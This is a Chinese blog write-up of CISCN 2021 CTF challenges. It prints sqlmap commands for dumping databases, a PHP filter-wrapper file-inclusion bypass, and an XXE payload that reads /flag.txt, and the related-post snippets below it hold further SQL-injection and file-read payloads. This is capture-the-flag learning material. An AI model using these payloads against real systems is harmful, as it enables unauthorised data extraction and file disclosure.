WP-CISCN2021

最新推荐文章于 2024-08-14 22:26:03 发布
最新推荐文章于 2024-08-14 22:26:03 发布
阅读量1.3w 收藏 2
点赞数
文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ce666666/article/details/117910434
版权

前言

这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。

Web

简单的注入

一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。

还是得靠sqlmap注入
Payload:

爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs
爆表:sqlmap.py –r txt –risk=3-level=3 –p password –D “数据库名” –-tables
爆列:sqlmap.py –r txt –risk=3 –level=3 –p password –D “数据库名” –T “数据表名” –-columns
Be_Careful

还是做题太少,不能一下子秒掉。

一道伪协议题,url显示file=1.php,尝试查看源码,filter协议查看index得到源码

Be Careful';} $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,'F14ggg.php')||stristr($file,"input")||stristr($file,"data")){ echo "I advise you to do good!"; exit(); } include($file); //real_flag.php ?>

再用base64对real_flag.php进行编码,得到real_flag.php的源码。

/**include('F14ggg.php');
$a = $_GET['a'];
$one = ord('1'); //49
$nine = ord('9'); //57
$number = '69563214562';
for ($i = 0; $i < strlen($number); $i++){
	$digit = ord($a{$i}); echo $digit;
if( ($digit >= $one) && ($digit <= $nine) )
{echo 'wrong';}
elseif($number == $a){echo $flag;
?>**/

所以将number的数转16进制

Payload:

url/real_flag.php?a=0x10324a6ae2
flagin

一道XXE外部漏洞的题,源题。
可以转载到该网址做这道题,只不过加了waf。
原题
利用师傅Payload,往XXE外部增加伪协议。

<!DOCTYPE ANY [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt"
]>
<user><username>&test;</username><password>123</password></user>

Misc

签到_misc

直接利用exe扫码,得到flag

Crypto

Sign me up

一大串编码,看到后面==,一直进行base64解码得到flag

总结

知不足,然后自反也

「已注销」
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
2021第十四届全国大学生信息安全竞赛WPCISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
2021CISCN RE WP
qq_45739995的博客
05-17 378
逆向题质量太高了,菜鸡比赛只做出来两个题。 其他的题会在赛后继续复现出来。 持续更新中… glass jeb打开主函数发现调用了native层 ida打开 输入长度39位 第一个函数跟进发现调用了rc4 第二个函数用v7对flag加密(数组移位+异或) 第三个直接对flag加密(三位一组进行加密处理+异或) 大体思路:根据已有的字符串,首先逆掉第三个函数 得到用rc4数组加密后的 然后求出rc4的数组 最后在第二个函数里进行异或拿到flag (变量名用的有点乱) #include<stdio.h&
第14届(2021)CISCN初赛WP(1)——easy_source
InterplanetaryW的博客
06-15 325
easy_source WriteUp 题目打开没发现啥,就先看看index.php,还是没有什么变化。这时候想起来前段时间遇到过考敏感文件的。有三种都来试试: robots.txt gedit备份文件,格式为filename~,比如index.php~ vim备份文件,格式为.filename.swp 或者 *.swo 然后发现备份文件/.index.php.swo可行 发现了GET传参的要求,构造payload: ?rc=ReflectionMethod&ra=User&rb=q
CISCN2021】第十四届全国大学生信息安全竞赛初赛-writeup
../../../../../../../
05-17 4412
这一次比赛分为三张“卷子”,我就直接归在一起吧 场景实操Misctiny trafficrunning_pixel Misc tiny traffic 打开流量包 根据文件和题目描述,我们直接导出http对象 可以看到,列表里面含有gzip和br文件,Gzip是一种压缩文件格式并且也是一个在类 Unix 上的一种文件解压缩的软件,BR文件是使用Brotli(一种开源数据压缩算法)压缩的文件 导出来后对这几个gzip和br文件解压缩,先看看flag_wrapper 并没有啥实质性的内容 看看test和se
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 807
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
wp-script-core
09-07
标签"wp-script-co"可能是一个简化的版本或者错误,完整的可能是"wp-script-core",用于标识与标题相关的关键词,帮助用户搜索和识别这个插件。在WordPress插件目录中,通常会用这样的标签来分类和组织插件。 **...
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
**WP-CLI(WordPress Command Line Interface)是WordPress开发和管理中的一个强大工具,它允许用户通过命令行界面执行各种操作,而无需通过图形用户界面。本教程将带你深入理解WP-CLI,包括如何安装、使用基础命令...
change-wp-content:将重命名 wp-content 目录的 Wordpress 插件
06-16
更改 wp-content 将 wp-content 目录重命名为“media”的 Wordpress 插件,这可能有助于提高站点安全性。 插件有什么作用? 一方面,它将以下定义添加到您的 wp-config 文件的适当位置: define ( 'WP_CONTENT_...
wordpress采集插件wp-autopost-pro wordpress4.9以上版本完美使用
08-19
【WordPress采集插件WP-AutoPost-Pro】 WordPress采集插件WP-AutoPost-Pro是一款功能强大的自动化内容采集工具,特别适用于WordPress 4.9及以上版本。它允许用户从互联网上自动抓取并发布内容,极大地提高了内容...
wordpress定时任务(wp-cron.php)造成主机CPU比较高的解决办法
09-28
WordPress中的定时任务功能主要依赖于wp-cron.php文件,这是一个内置的模拟Linux系统cron job的机制。当WordPress检测到有用户访问网站时,它会检查是否有预定的任务需要执行。这种设计使得WordPress能够在没有实际...
ciscn_2021_lonelywolf.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
2021CISCN writeup
读万卷书,行万里路。
05-16 961
2021CISCN writeup 1.1 easy_sql 进行手动测试,发现可以进行报错注入。Payload 为: ') AND updatexml(1, concat(0x7e, (database()), 0x7e), 1)-- 尝试读取数据库表的表名,发现information关键字被过滤,猜了一下表名为 fl4g、flag,最后确定表名为 flag。 使用 join 爆出字段名。 select*from (select * from flag as a join flag b)c sele
[CISCN2021 Quals]upload
shinygod的博客
05-06 844
在这里插入代码片 upload.php,中限制了图片的大小,长宽,以及一些字母。 <?php #Quals]upload if (!isset($_GET["ctf"])) { highlight_file(__FILE__); die(); } if(isset($_GET["ctf"])) $ctf = $_GET["ctf"]; if($ctf=="upload") { if ($_FILES['postedFile']['size'] > 1024
2021ciscn初赛web部分简单wp
weixin_45805993的博客
05-24 440
0x00. 简单的题不想写wp,难的题写不出来……这篇博客应该会比较水,不喜勿喷 0x01.easy_source Payload http://xxxxxxxxxx/index.php?rc=splFileobject&ra=.index.php.swo&ra=php://filter/read=convert.base64-encode/resource=index.php&rb=rb&rd=fgets 挺简单的,不细说了 用php原生类splFileObject,用ge
CISCN 2021 题目复现
树木常青的博客
05-21 1534
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
CISCN2021 部分逆向WP
jinxxxxxx的博客
05-21 634
glass 调用了native-lib libnative.so拖入ida 第二次变化 写脚本 from Crypto.Cipher import ARC4 data = [0xA3, 0x1A, 0xE3, 0x69, 0x2F, 0xBB, 0x1A, 0x84, 0x65, 0xC2, 0xAD, 0xAD, 0x9E, 0x96, 0x05, 0x02, 0x1F, 0x8E, 0x36, 0x4F, 0xE1, 0xEB, 0xAF, 0xF0, 0xEA, 0xC4, 0xA
安全工具推荐-Search_Viewer资产测绘】
最新发布
qq_55213436的博客
08-14 131
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
wp-rest-api jwt
09-13
WP-REST-API JWT整合了WordPress的REST API和JWT的认证机制,使得在使用WP-REST-API进行开发的过程中,可以增加身份验证和授权的功能。它允许开发人员在请求WordPress REST API时,通过在请求头或参数中提供有效的...
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值